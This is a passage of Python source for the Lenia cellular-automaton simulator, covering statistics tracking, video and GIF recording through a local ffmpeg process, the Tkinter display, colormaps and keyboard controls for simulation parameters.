self.series[-1] == []:\n\t\t\t\tself.series.pop()\n\t\t\tif self.series != []:\n\t\t\t\tself.series[-1] = []\n\tdef clear_series(self):\n\t\tself.series = []\n\n\tdef add_stat(self):\n\t\tR, T, pm, ps = [self.world.params[k] for k in ('R', 'T', 'm', 's')]\n\t\tv = [pm, ps, self.automaton.gen, self.automaton.time, \n\t\t\tself.mass/R/R, self.growth/R/R, self.inertia, \n\t\t\tself.m_shift*T, self.m_rotate*T, self.mg_dist, self.mass_asym/R/R]\n\t\t\t# self.shape_major_axis, self.shape_minor_axis,\n\t\t\t# self.shape_eccentricity, self.shape_compactness, self.shape_rotate]\n\t\tif self.series == []:\n\t\t\tself.new_segment()\n\t\tsegment = self.series[-1]\n\t\tsegment.append(v)\n\t\tif self.is_clip_segment:\n\t\t\twhile len(segment) > self.SEGMENT_LEN:\n\t\t\t\tsegment.pop(0)\n\n\tdef center_world(self):\n\t\tif self.mass < EPSILON or self.m_center is None:\n\t\t\treturn\n\t\tself.last_shift_idx = (self.m_center * self.world.params['R']).astype(int)\n\t\tself.world.cells = np.roll(self.world.cells, -self.last_shift_idx, (1, 0))\n\t\tself.total_shift_idx += self.last_shift_idx\n\n\tdef recurrence_plot(self, e=0.1, steps=10):\n\t\t''' https://stackoverflow.com/questions/33650371/recurrence-plot-in-python '''\n\t\td = scipy.spatial.distance.pdist(self.series[:, None])\n\t\td = np.floor(d/e)\n\t\td[d>steps] = steps\n\t\tZ = scipy.spatial.distance.squareform(d)\n\t\treturn Z\n\nclass Recorder:\n\tRECORD_ROOT = 'record'\n\tFRAME_EXT = '.png'\n\tVIDEO_EXT = '.mov'\n\tGIF_EXT = '.gif'\n\tANIM_FPS = 25\n\tffmpeg_cmd = ['/usr/local/bin/ffmpeg',\n\t\t'-loglevel','warning', '-y', # glocal options\n\t\t'-f','rawvideo', '-vcodec','rawvideo', '-pix_fmt','rgb24', # input options\n\t\t'-s','{}x{}'.format(SIZEX*PIXEL, SIZEY*PIXEL), '-r',str(ANIM_FPS),\n\t\t'-i','{input}', # input pipe\n\t\t# '-an', '-vcodec','h264', '-pix_fmt','yuv420p', '-crf','1', # output options\n\t\t'-an', '-vcodec','copy', # output options\n\t\t'{output}'] # ouput file\n\n\tdef __init__(self, world):\n\t\tself.world = world\n\t\tself.is_recording = False\n\t\tself.is_save_frames = False\n\t\tself.record_id = None\n\t\tself.record_seq = None\n\t\tself.img_dir = None\n\t\tself.video_path = None\n\t\tself.video = None\n\t\tself.gif_path = None\n\t\tself.gif = None\n\n\tdef toggle_recording(self, is_save_frames=False):\n\t\tself.is_save_frames = is_save_frames\n\t\tif not self.is_recording:\n\t\t\tself.start_record()\n\t\telse:\n\t\t\tself.finish_record()\n\n\tdef start_record(self):\n\t\tglobal STATUS\n\t\t''' https://trac.ffmpeg.org/wiki/Encode/H.264\n\t\t https://trac.ffmpeg.org/wiki/Slideshow '''\n\t\tself.is_recording = True\n\t\tSTATUS.append(\"> start \" + (\"saving frames\" if self.is_save_frames else \"recording video\") + \" and GIF...\")\n\t\tself.record_id = '{}-{}'.format(self.world.names[0].split('(')[0], datetime.datetime.now().strftime('%Y%m%d-%H%M%S-%f'))\n\t\tself.record_seq = 1\n\t\tself.video_path = os.path.join(self.RECORD_ROOT, self.record_id + self.VIDEO_EXT)\n\t\tself.gif_path = os.path.join(self.RECORD_ROOT, self.record_id + self.GIF_EXT)\n\t\tself.img_dir = os.path.join(self.RECORD_ROOT, self.record_id)\n\t\tif self.is_save_frames:\n\t\t\tif not os.path.exists(self.img_dir):\n\t\t\t\tos.makedirs(self.img_dir)\n\t\telse:\n\t\t\tcmd = [s.replace('{input}', '-').replace('{output}', self.video_path) for s in self.ffmpeg_cmd]\n\t\t\ttry:\n\t\t\t\tself.video = subprocess.Popen(cmd, stdin=subprocess.PIPE) # stderr=subprocess.PIPE\n\t\t\texcept FileNotFoundError:\n\t\t\t\tself.video = None\n\t\t\t\tSTATUS.append(\"> no 
ffmpeg program found!\")\n\t\tself.gif = []\n\n\tdef save_image(self, img, filename=None):\n\t\tself.record_id = '{}-{}'.format(self.world.names[0].split('(')[0], datetime.datetime.now().strftime('%Y%m%d-%H%M%S-%f'))\n\t\timg_path = filename + self.FRAME_EXT if filename else os.path.join(self.RECORD_ROOT, self.record_id + self.FRAME_EXT)\n\t\timg.save(img_path)\n\n\tdef record_frame(self, img):\n\t\tif self.is_save_frames:\n\t\t\timg_path = os.path.join(self.RECORD_ROOT, self.record_id, '{:03d}'.format(self.record_seq) + self.FRAME_EXT)\n\t\t\timg.save(img_path)\n\t\telse:\n\t\t\tif self.video:\n\t\t\t\timg_rgb = img.convert('RGB').tobytes()\n\t\t\t\tself.video.stdin.write(img_rgb)\n\t\tself.gif.append(img)\n\t\tself.record_seq += 1\n\n\tdef finish_record(self):\n\t\tglobal STATUS\n\t\tif self.is_save_frames:\n\t\t\tSTATUS.append(\"> frames saved to '\" + self.img_dir + \"/*\" + self.FRAME_EXT + \"'\")\n\t\t\tcmd = [s.replace('{input}', os.path.join(self.img_dir, '%03d'+self.FRAME_EXT)).replace('{output}', self.video_path) for s in self.ffmpeg_cmd]\n\t\t\ttry:\n\t\t\t\tsubprocess.call(cmd)\n\t\t\texcept FileNotFoundError:\n\t\t\t\tself.video = None\n\t\t\t\tSTATUS.append(\"> no ffmpeg program found!\")\n\t\telse:\n\t\t\tif self.video:\n\t\t\t\tself.video.stdin.close()\n\t\t\t\tSTATUS.append(\"> video saved to '\" + self.video_path + \"'\")\n\t\tself.gif[0].save(self.gif_path, format=self.GIF_EXT.lstrip('.'), save_all=True, append_images=self.gif[1:], loop=0, duration=1000//self.ANIM_FPS)\n\t\tself.gif = None\n\t\tSTATUS.append(\"> GIF saved to '\" + self.gif_path + \"'\")\n\t\tself.is_recording = False\n\nclass Lenia:\n\tMARKER_COLORS = [95,95,95,127,127,127,255,255,255]\n\tdef __init__(self):\n\t\tself.is_run = True\n\t\tself.is_once = False\n\t\tself.is_show = True\n\t\tself.is_closing = False\n\t\tself.show_what = 0\n\t\tself.is_show_markers = True\n\t\tself.stats_mode = 0\n\t\tself.stat_x = 4\n\t\tself.stat_y = 5\n\t\tself.is_show_fps = False\n\t\tself.fps = None\n\t\tself.last_time = None\n\t\tself.fore = None\n\t\tself.back = None\n\t\tself.is_layered = False\n\t\tself.is_auto_center = False\n\t\tself.is_auto_load = False\n\t\tself.trace_dir = 0\n\t\tself.trace_small = False\n\t\t''' http://hslpicker.com/ '''\n\t\tself.colormaps = [\n\t\t\tself.create_colormap(np.array([[0,0,4],[0,0,8],[0,4,8],[0,8,8],[4,8,4],[8,8,0],[8,4,0],[8,0,0],[4,0,0]])), #BCYR\n\t\t\tself.create_colormap(np.array([[0,2,0],[0,4,0],[4,6,0],[8,8,0],[8,4,4],[8,0,8],[4,0,8],[0,0,8],[0,0,4]])), #GYPB\n\t\t\tself.create_colormap(np.array([[4,0,2],[8,0,4],[8,0,6],[8,0,8],[4,4,4],[0,8,0],[0,6,0],[0,4,0],[0,2,0]])), #PPGG\n\t\t\tself.create_colormap(np.array([[4,4,6],[2,2,4],[2,4,2],[4,6,4],[6,6,4],[4,2,2]])), #BGYR\n\t\t\tself.create_colormap(np.array([[4,6,4],[2,4,2],[4,4,2],[6,6,4],[6,4,6],[2,2,4]])), #GYPB\n\t\t\tself.create_colormap(np.array([[6,6,4],[4,4,2],[4,2,4],[6,4,6],[4,6,6],[2,4,2]])), #YPCG\n\t\t\tself.create_colormap(np.array([[0,0,0],[3,3,3],[4,4,4],[5,5,5],[8,8,8]]))] #B/W\n\t\tself.colormap_id = 0\n\t\tself.set_colormap()\n\t\tself.last_key = None\n\t\tself.excess_key = None\n\t\tself.update = None\n\t\tself.clear_job = None\n\t\tself.is_save_image = False\n\n\t\tself.read_animals()\n\t\tself.world = Board((SIZEY, SIZEX))\n\t\tself.automaton = Automaton(self.world)\n\t\tself.analyzer = Analyzer(self.automaton)\n\t\tself.recorder = Recorder(self.world)\n\t\tself.clear_transform()\n\t\tself.create_window()\n\t\tself.create_menu()\n\n\tdef clear_transform(self):\n\t\tself.tx = {'shift':[0, 0], 'rotate':0, 
'R':self.world.params['R'], 'flip':-1}\n\n\tdef read_animals(self):\n\t\twith open('animals.json', encoding='utf-8') as file:\n\t\t\tself.animal_data = json.load(file)\n\n\tdef load_animal_id(self, id, **kwargs):\n\t\tself.animal_id = max(0, min(len(self.animal_data)-1, id))\n\t\tself.load_part(Board.from_data(self.animal_data[self.animal_id]), **kwargs)\n\n\tdef load_animal_code(self, code, **kwargs):\n\t\tif not code: return\n\t\tid = self.get_animal_id(code)\n\t\tif id: self.load_animal_id(id, **kwargs)\n\n\tdef get_animal_id(self, code):\n\t\tcode_sp = code.split(':')\n\t\tn = int(code_sp[1]) if len(code_sp)==2 else 1\n\t\tit = (id for (id, data) in enumerate(self.animal_data) if data[\"code\"]==code_sp[0])\n\t\tfor i in range(n):\n\t\t\tid = next(it, None)\n\t\treturn id\n\n\tdef load_part(self, part, is_replace=True, is_random=False, is_auto_load=False, repeat=1):\n\t\tself.fore = part\n\t\tif part.names[0].startswith('~'):\n\t\t\tpart.names[0] = part.names[0].lstrip('~')\n\t\t\tself.world.params['R'] = part.params['R']\n\t\t\tself.automaton.calc_kernel()\n\t\tif is_replace:\n\t\t\tself.world.names = part.names.copy()\n\t\tif part.params is not None and part.cells is not None:\n\t\t\tis_life = ((self.world.params.get('kn') or self.automaton.kn) == 4)\n\t\t\twill_be_life = ((part.params.get('kn') or self.automaton.kn) == 4)\n\t\t\tif not is_life and will_be_life:\n\t\t\t\tself.colormap_id = len(self.colormaps) - 1\n\t\t\t\tself.win.title('Conway\\'s Game of Life')\n\t\t\telif is_life and not will_be_life:\n\t\t\t\tself.colormap_id = 0\n\t\t\t\tself.world.params['R'] = DEF_R\n\t\t\t\tself.automaton.calc_kernel()\n\t\t\t\tself.win.title('Lenia')\n\t\t\tif self.is_layered:\n\t\t\t\tself.back = copy.deepcopy(self.world)\n\t\t\tif is_replace and not self.is_layered:\n\t\t\t\tif not is_auto_load:\n\t\t\t\t\tself.world.params = {**part.params, 'R':self.world.params['R']}\n\t\t\t\t\tself.automaton.calc_kernel()\n\t\t\t\tself.world.clear()\n\t\t\t\tself.automaton.reset()\n\t\t\t\tif not is_auto_load:\n\t\t\t\t\tself.analyzer.reset()\n\t\t\tself.clear_transform()\n\t\t\tfor i in range(repeat):\n\t\t\t\tif is_random:\n\t\t\t\t\tself.tx['rotate'] = np.random.random() * 360\n\t\t\t\t\th1, w1 = self.world.cells.shape\n\t\t\t\t\th, w = min(part.cells.shape, self.world.cells.shape)\n\t\t\t\t\tself.tx['shift'] = [np.random.randint(d1 + d) - d1//2 for (d,d1) in [(h,h1), (w,w1)]]\n\t\t\t\t\tself.tx['flip'] = np.random.randint(3) - 1\n\t\t\t\tself.world.add_transformed(part, self.tx)\n\n\tdef check_auto_load(self):\n\t\tif self.is_auto_load:\n\t\t\tself.load_part(self.fore, is_auto_load=True)\n\n\tdef transform_world(self):\n\t\tif self.is_layered:\n\t\t\tself.world.cells = self.back.cells.copy()\n\t\t\tself.world.params = self.back.params.copy()\n\t\t\tself.world.transform(self.tx, mode='Z', is_world=True)\n\t\t\tself.world.add_transformed(self.fore, self.tx)\n\t\telse:\n\t\t\tif not self.is_run:\n\t\t\t\tif self.back is None:\n\t\t\t\t\tself.back = copy.deepcopy(self.world)\n\t\t\t\telse:\n\t\t\t\t\tself.world.cells = self.back.cells.copy()\n\t\t\t\t\tself.world.params = self.back.params.copy()\n\t\t\tself.world.transform(self.tx, is_world=True)\n\t\tself.automaton.calc_kernel()\n\n\tdef clear_world(self):\n\t\tself.world.clear()\n\t\tif self.is_layered:\n\t\t\tself.back = copy.deepcopy(self.world)\n\t\tself.automaton.reset()\n\t\tself.analyzer.reset()\n\n\tdef random_world(self):\n\t\tself.world.clear()\n\t\tborder = self.world.params['R']\n\t\trand = np.random.rand(SIZEY - border*2, SIZEX - 
border*2)\n\t\tself.world.add(Board.from_values(None, None, rand))\n\t\tif self.is_layered:\n\t\t\tself.back = copy.deepcopy(self.world)\n\t\tself.automaton.reset()\n\t\tself.analyzer.reset()\n\n\tdef toggle_trace(self, dir, small):\n\t\tif self.trace_dir == 0:\n\t\t\tself.trace_dir = dir\n\t\t\tself.trace_small = small\n\t\t\tself.is_auto_center = True\n\t\t\tself.is_auto_load = True\n\t\telse:\n\t\t\tself.trace_dir = 0\n\n\tdef stop_trace(self):\n\t\tself.trace_dir = 0\n\n\tdef trace_params(self):\n\t\ts = 's+' if self.trace_small else ''\n\t\tif self.trace_dir == +1:\n\t\t\tif self.analyzer.is_empty: self.key_press_internal(s+'w')\n\t\t\telif self.analyzer.is_full: self.key_press_internal(s+'q')\n\t\telif self.trace_dir == -1:\n\t\t\tif self.analyzer.is_empty: self.key_press_internal(s+'a')\n\t\t\telif self.analyzer.is_full: self.key_press_internal(s+'s')\n\n\tdef create_window(self):\n\t\tself.win = tk.Tk()\n\t\tself.win.title('Lenia')\n\t\tself.win.bind('', self.key_press_event)\n\t\tself.frame = tk.Frame(self.win, width=SIZEX*PIXEL, height=SIZEY*PIXEL)\n\t\tself.frame.pack()\n\t\tself.canvas = tk.Canvas(self.frame, width=SIZEX*PIXEL, height=SIZEY*PIXEL)\n\t\tself.canvas.place(x=-1, y=-1)\n\t\tself.panel1 = self.create_panel(0, 0)\n\t\t# self.panel2 = self.create_panel(1, 0)\n\t\t# self.panel3 = self.create_panel(0, 1)\n\t\t# self.panel4 = self.create_panel(1, 1)\n\t\tself.info = tk.Label(self.win)\n\t\tself.info.pack()\n\n\tdef create_panel(self, c, r):\n\t\tbuffer = np.uint8(np.zeros((SIZEY*PIXEL,SIZEX*PIXEL)))\n\t\timg = Image.frombuffer('P', (SIZEX*PIXEL,SIZEY*PIXEL), buffer, 'raw', 'P', 0, 1)\n\t\tphoto = ImageTk.PhotoImage(image=img)\n\t\treturn self.canvas.create_image(c*SIZEY, r*SIZEX, image=photo, anchor=tk.NW)\n\n\tdef create_colormap(self, colors):\n\t\tnval = 256 - 3\n\t\tncol = colors.shape[0]\n\t\tcolors = np.vstack((colors, np.array([[0,0,0]])))\n\t\tv = np.repeat(range(nval), 3) # [0 0 0 1 1 1 ... 252 252 252]\n\t\ti = np.array(list(range(3)) * nval) # [0 1 2 0 1 2 ... 0 1 2]\n\t\tk = v / (nval-1) * (ncol-1) # interpolate between 0 .. ncol-1\n\t\tk1 = k.astype(int)\n\t\tc1, c2 = colors[k1,i], colors[k1+1,i]\n\t\tc = (k-k1) * (c2-c1) + c1 # interpolate between c1 .. 
c2\n\t\treturn np.rint(c / 8 * 255).astype(int).tolist() + self.MARKER_COLORS\n\n\tdef set_colormap(self):\n\t\tself.colormap_demo = np.tile(np.arange(SIZEX), (1, SIZEY)) / SIZEX\n\n\tSHOW_WHAT_NUM = 7\n\tdef update_win(self):\n\t\tif self.stats_mode in [0, 3]:\n\t\t\tchange_range = 1 if not self.automaton.is_soft_clip else 1.4\n\t\t\tif self.show_what==0: self.draw_world(self.world.cells, 0, 1, is_shift=True, is_shift_zero=True, markers=['arrow','ruler','grid'])\n\t\t\t# if self.show_what==0: self.draw_world(self.analyzer.aaa, 0, 1, is_shift=True, is_shift_zero=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==1: self.draw_world(self.automaton.potential, 0, 2*self.world.params['m'], is_shift=True, is_shift_zero=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==2: self.draw_world(self.automaton.field, -1, 1, is_shift=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==3: self.draw_world(self.automaton.change, -change_range, change_range, is_shift=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==4: self.draw_world(self.automaton.kernel, 0, 1, markers=['ruler','fixgrid'])\n\t\t\telif self.show_what==5: self.draw_world(self.automaton.fftshift(np.log(np.absolute(self.automaton.world_FFT))), 0, 5)\n\t\t\telif self.show_what==6: self.draw_world(self.automaton.fftshift(np.log(np.absolute(self.automaton.potential_FFT))), 0, 5)\n\t\t\telif self.show_what==7: self.draw_world(self.colormap_demo, 0, 1)\n\t\t\tself.img.putpalette(self.colormaps[self.colormap_id])\n\t\telif self.stats_mode in [1, 2]:\n\t\t\tself.draw_black()\n\n\t\tif self.stats_mode in [1, 2, 3]:\n\t\t\tself.draw_stats()\n\n\t\tif self.recorder.is_recording and self.is_run:\n\t\t\tself.recorder.record_frame(self.img)\n\t\tif self.is_save_image:\n\t\t\tself.recorder.save_image(self.img, filename='saved')\n\t\t\tself.is_save_image = False\n\n\t\tphoto = ImageTk.PhotoImage(image=self.img)\n\t\t# photo = tk.PhotoImage(width=SIZEX, height=SIZEY)\n\t\tself.canvas.itemconfig(self.panel1, image=photo)\n\t\tself.win.update()\n\n\tdef draw_world(self, A, vmin=0, vmax=1, is_shift=False, is_shift_zero=False, markers=[]):\n\t\tif is_shift and not self.is_auto_center:\n\t\t\tA = np.roll(A, self.analyzer.total_shift_idx.astype(int), (1, 0))\n\t\tif is_shift_zero and self.automaton.is_soft_clip:\n\t\t\tif vmin==0: vmin = np.amin(A)\n\t\tbuffer = np.uint8(np.clip((A-vmin) / (vmax-vmin), 0, 1) * 252) # .copy(order='C')\n\t\tif self.is_show_markers and ('grid' in markers or 'fixgrid' in markers):\n\t\t\tself.draw_grid(buffer, is_fixed='fixgrid' in markers)\n\t\tbuffer = np.repeat(np.repeat(buffer, PIXEL, axis=0), PIXEL, axis=1)\n\t\tzero = np.uint8(np.clip((0-vmin) / (vmax-vmin), 0, 1) * 252)\n\t\tfor i in range(PIXEL_BORDER):\n\t\t\tbuffer[i::PIXEL, :] = zero; buffer[:, i::PIXEL] = zero\n\t\tself.img = Image.frombuffer('P', (SIZEX*PIXEL,SIZEY*PIXEL), buffer, 'raw', 'P', 0, 1)\n\t\tif self.is_show_markers and ('arrow' in markers or 'ruler' in markers):\n\t\t\tself.draw_markers(markers)\n\n\tdef draw_black(self):\n\t\tsize = (SIZEX*PIXEL,SIZEY*PIXEL)\n\t\tself.img = Image.frombuffer('L', size, np.zeros(size), 'raw', 'L', 0, 1)\n\n\tdef draw_grid(self, buffer, is_fixed=False):\n\t\tR = self.world.params['R']\n\t\tn = R // 40 if R >= 15 else -1\n\t\tfor i in range(-n, n+1):\n\t\t\tsx, sy = 0, 0\n\t\t\tif self.is_auto_center and not is_fixed:\n\t\t\t\tsx, sy = (self.analyzer.total_shift_idx).astype(int)\n\t\t\tgrid = buffer[(MIDY - sy + i) % R:SIZEY:R, (MIDX - sx) % R:SIZEX:R]; 
grid[grid==0] = 253\n\t\t\tgrid = buffer[(MIDY - sy) % R:SIZEY:R, (MIDX - sx + i) % R:SIZEX:R]; grid[grid==0] = 253\n\n\tdef draw_markers(self, markers=[]):\n\t\tR, T = [self.world.params[k] for k in ('R', 'T')]\n\t\tmidpoint = np.array([MIDX, MIDY])\n\t\tdraw = ImageDraw.Draw(self.img)\n\t\td2 = np.array([1, 1]) * 2\n\t\tif 'arrow' in markers and self.analyzer.m_last_center is not None and self.analyzer.m_center is not None:\n\t\t\tshift = self.analyzer.total_shift_idx if not self.is_auto_center else np.zeros(2)\n\t\t\tm0 = self.analyzer.m_last_center * R + midpoint + shift - self.analyzer.last_shift_idx\n\t\t\tm1 = self.analyzer.m_center * R + midpoint + shift\n\t\t\tms = m1 % np.array([SIZEX, SIZEY]) - m1\n\t\t\tm2, m3 = [m0 + (m1 - m0) * n * T for n in [1,2]]\n\t\t\tfor i in range(-1, 2):\n\t\t\t\tfor j in range(-1, 2):\n\t\t\t\t\tadj = np.array([i*SIZEX, j*SIZEY]) + ms\n\t\t\t\t\tdraw.line(tuple((m0+adj)*PIXEL) + tuple((m3+adj)*PIXEL), fill=254, width=1)\n\t\t\t\t\t[draw.ellipse(tuple((m+adj-d2)*PIXEL) + tuple((m+adj+d2)*PIXEL), fill=c) for (m,c) in [(m0,254),(m1,255),(m2,255),(m3,255)]]\n\t\tif 'ruler' in markers:\n\t\t\tx0, y0 = SIZEX*PIXEL-20, SIZEY*PIXEL-20\n\t\t\tx1, x2, x3, y1, y2 = x0-10-R*PIXEL, x0-10-R*PIXEL//2, x0-10, y0+3, y0+8\n\t\t\tdraw.text((x0, y0), 'R', fill=254)\n\t\t\tdraw.line([(x1,y1),(x1,y2),(x2,y2),(x2,y1),(x2,y2),(x3,y2),(x3,y1)], fill=254, width=1)\n\t\tdel draw\n\n\tdef draw_stats(self):\n\t\tdraw = ImageDraw.Draw(self.img)\n\t\tseries = self.analyzer.series\n\t\tif series != [] and self.stats_mode in [2, 3]:\n\t\t\tseries = [series[-1]]\n\t\tif series != [] and series != [[]]:\n\t\t\tX = [[v[self.stat_x] for v in s] for s in series]\n\t\t\tY = [[v[self.stat_y] for v in s] for s in series]\n\t\t\t# if self.stat_x in [0,1] or self.stat_y in [0,1]:\n\t\t\t# \tX, Y = X[-100:], Y[-100:]\n\t\t\tif self.stat_x in [2, 3]: X = [[x - min(s) for x in s] for s in X]\n\t\t\tif self.stat_y in [2, 3]: Y = [[y - min(s) for y in s] for s in Y]\n\t\t\txmin, xmax = min(min(s) for s in X if s), max(max(s) for s in X if s)\n\t\t\tymin, ymax = min(min(s) for s in Y if s), max(max(s) for s in Y if s)\n\t\t\tif xmax-xmin>EPSILON and ymax-ymin>EPSILON:\n\t\t\t\tif self.stats_mode in [1, 2]:\n\t\t\t\t\tC = reversed([194 // 2**i + 61 for i in range(len(X))])\n\t\t\t\telse:\n\t\t\t\t\tC = [255] * len(X)\n\t\t\t\tfor x, y, c in zip(X, Y, C):\n\t\t\t\t\txa, ya = np.array(x), np.array(y)\n\t\t\t\t\txa = (xa - xmin) / (xmax - xmin) * (SIZEX - 10) + 5\n\t\t\t\t\tya = (ya - ymin) / (ymax - ymin) * (SIZEY - 10) + 5\n\t\t\t\t\tdraw.line(list(zip(xa, ya)), fill=c, width=1)\n\t\tdel draw\n\n\tdef calc_fps(self):\n\t\tif self.automaton.gen == 0:\n\t\t\tself.last_time = time.time()\n\t\telif self.automaton.gen % FPS_FREQ == 0:\n\t\t\tthis_time = time.time()\n\t\t\tself.fps = FPS_FREQ / (this_time - self.last_time)\n\t\t\tself.last_time = this_time\n\n\tSHIFT_KEYS = {'asciitilde':'quoteleft', 'exclam':'1', 'at':'2', 'numbersign':'3', 'dollar':'4', 'percent':'5', 'asciicircum':'6', 'ampersand':'7', 'asterisk':'8', 'parenleft':'9', 'parenright':'0', 'underscore':'-', 'plus':'equal', \\\n\t\t'braceleft':'bracketleft', 'braceright':'bracketright', 'bar':'backslash', 'colon':'semicolon', 'quotedbl':'quoteright', 'less':'comma', 'greater':'period', 'question':'slash'}\n\tdef key_press_event(self, event):\n\t\t''' TKInter keys: https://www.tcl.tk/man/tcl8.6/TkCmd/keysyms.htm '''\n\t\t# Win: shift_l/r(0x1) caps_lock(0x2) control_l/r(0x4) alt_l/r(0x20000) win/app/alt_r/control_r(0x40000)\n\t\t# Mac: 
shift_l(0x1) caps_lock(0x2) control_l(0x4) meta_l(0x8,command) alt_l(0x10) super_l(0x40,fn)\n\t\t# print('keysym[{0.keysym}] char[{0.char}] keycode[{0.keycode}] state[{1}]'.format(event, hex(event.state))); return\n\t\tkey = event.keysym\n\t\tstate = event.state\n\t\ts = 's+' if state & 0x1 or (key.isalpha() and len(key)==1 and key.isupper()) else ''\n\t\tc = 'c+' if state & 0x4 or (not is_windows and state & 0x8) else ''\n\t\ta = 'a+' if state & 0x20000 else ''\n\t\tkey = key.lower()\n\t\tif key in self.SHIFT_KEYS:\n\t\t\tkey = self.SHIFT_KEYS[key]\n\t\t\ts = 's+'\n\t\tself.last_key = s + c + a + key\n\t\tself.is_internal_key = False\n\n\tdef key_press_internal(self, key):\n\t\tself.last_key = key\n\t\tself.is_internal_key = True\n\n\tANIMAL_KEY_LIST = {'1':'O2(a)', '2':'OG2', '3':'OV2', '4':'P4(a)', '5':'2S1:5', '6':'2S2:2', '7':'P6,3s', '8':'2PG1:2', '9':'3H3', '0':'~gldr', \\\n\t\t's+1':'3G:4', 's+2':'3GG', 's+3':'K5(4,1)', 's+4':'K7(4,3)', 's+5':'K9(5,4)', 's+6':'3A5', 's+7':'4A6', 's+8':'2D10', 's+9':'4F12', 's+0':'~ggun', \\\n\t\t'c+1':'4Q(5,5,5,5):3', 'c+2':'2P7:2', 'c+3':'3GA', 'c+4':'K4(2,2):3', 'c+5':'K4(2,2):5', 'c+6':'3R4(3,3,2):4', 'c+7':'3F6', 'c+8':'4F7', 'c+9':'', 'c+0':'bbug'}\n\tdef process_key(self, k):\n\t\tglobal STATUS\n\t\tinc_or_dec = 1 if 's+' not in k else -1\n\t\tinc_10_or_1 = (10 if 's+' not in k else 1) if 'c+' not in k else 0 \n\t\tinc_big_or_not = 0 if 'c+' not in k else 1\n\t\tinc_1_or_10 = 1 if 's+' not in k else 10\n\t\tinc_mul_or_not = 1 if 's+' not in k else 0\n\t\tdouble_or_not = 2 if 's+' not in k else 1\n\t\tinc_or_not = 0 if 's+' not in k else 1\n\n\t\tis_ignore = False\n\t\tif not self.is_internal_key:\n\t\t\tself.stop_trace()\n\n\t\tif k in ['escape']: self.is_closing = True; self.close()\n\t\telif k in ['enter', 'return']: self.is_run = not self.is_run\n\t\telif k in [' ', 'space']: self.is_once = not self.is_once; self.is_run = False\n\t\telif k in ['quoteright']: self.is_show = not self.is_show\n\t\telif k in ['quoteleft', 's+quoteleft']: self.colormap_id = (self.colormap_id + inc_or_dec) % len(self.colormaps); self.set_colormap()\n\t\telif k in ['tab', 's+tab']: self.show_what = (self.show_what + inc_or_dec) % self.SHOW_WHAT_NUM\n\t\telif k in ['c+tab']: self.show_what = 0 if self.show_what == self.SHOW_WHAT_NUM else self.SHOW_WHAT_NUM\n\t\telif k in ['q', 's+q']: self.world.params['m'] += inc_10_or_1 * 0.001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['a', 's+a']: self.world.params['m'] -= inc_10_or_1 * 0.001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['w', 's+w']: self.world.params['s'] += inc_10_or_1 * 0.0001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['s', 's+s']: self.world.params['s'] -= inc_10_or_1 * 0.0001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['t', 's+t']: self.world.params['T'] = max(1, self.world.params['T'] * double_or_not + inc_or_not); self.update = 'param'\n\t\telif k in ['g', 's+g']: self.world.params['T'] = max(1, self.world.params['T'] // double_or_not - inc_or_not); self.update = 'param'\n\t\telif k in ['r', 's+r']: self.tx['R'] = max(1, self.tx['R'] + inc_10_or_1); self.transform_world(); self.update = 'param'\n\t\telif k in ['f', 's+f']: self.tx['R'] = max(1, self.tx['R'] - inc_10_or_1); self.transform_world(); self.update = 'param'\n\t\telif k in ['c+q', 's+c+q']: self.toggle_trace(+1, 's+' in k)\n\t\telif k in ['c+a', 's+c+a']: 
self.toggle_trace(-1, 's+' in k)\n\t\telif k in ['c+w', 's+c+w']: pass # randam params and/or peaks\n\t\telif k in ['c+r']: self.tx['R'] = DEF_R; self.transform_world(); self.update = 'param'\n\t\telif k in ['c+f']: self.tx['R'] = self.fore.params['R'] if self.fore else DEF_R; self.transform_world(); self.update = 'param'\n\t\telif k in ['c+y', 's+c+y']: self.automaton.kn = (self.automaton.kn + inc_or_dec - 1) % len(self.automaton.kernel_core) + 1; self.update = 'kn'\n\t\telif k in ['c+u', 's+c+u']: self.automaton.gn = (self.automaton.gn + inc_or_dec - 1) % len(self.automaton.field_func) + 1; self.update = 'gn'\n\t\telif k in ['c+i']: self.automaton.is_soft_clip = not self.automaton.is_soft_clip\n\t\telif k in ['c+o']: self.automaton.is_multi_step = not self.automaton.is_multi_step\n\t\telif k in ['c+p']: self.automaton.is_inverted = not self.automaton.is_inverted; self.world.params['T'] *= -1; self.world.params['m'] = 1 - self.world.params['m']; self.world.cells = 1 - self.world.cells\n\t\telif k in ['down', 's+down', 'c+down' ]: self.tx['shift'][0] += inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['up', 's+up', 'c+up' ]: self.tx['shift'][0] -= inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['right', 's+right', 'c+right']: self.tx['shift'][1] += inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['left', 's+left', 'c+left' ]: self.tx['shift'][1] -= inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['pageup', 's+pageup', 'c+pageup', 'prior', 's+prior', 'c+prior']: self.tx['rotate'] += inc_10_or_1 + inc_big_or_not * 45; self.transform_world()\n\t\telif k in ['pagedown', 's+pagedown', 'c+pagedown', 'next', 's+next' , 'c+next' ]: self.tx['rotate'] -= inc_10_or_1 + inc_big_or_not * 45; self.transform_world()\n\t\telif k in ['home' ]: self.tx['flip'] = 0 if self.tx['flip'] != 0 else -1; self.transform_world()\n\t\telif k in ['end' ]: self.tx['flip'] = 1 if self.tx['flip'] != 1 else -1; self.transform_world()\n\t\telif k in ['equal' ]: self.tx['flip'] = 2 if self.tx['flip'] != 0 else -1; self.transform_world()\n\t\telif k in ['s+equal']: self.tx['flip'] = 3 if self.tx['flip'] != 0 else -1; self.transform_world()\n\t\telif k in ['m']: self.is_auto_center = not self.is_auto_center\n\t\telif k in ['backspace', 'delete']: self.clear_world()\n\t\telif k in ['c', 's+c']: self.load_animal_id(self.animal_id - inc_1_or_10); self.update = 'animal'\n\t\telif k in ['v', 's+v']: self.load_animal_id(self.animal_id + inc_1_or_10); self.update = 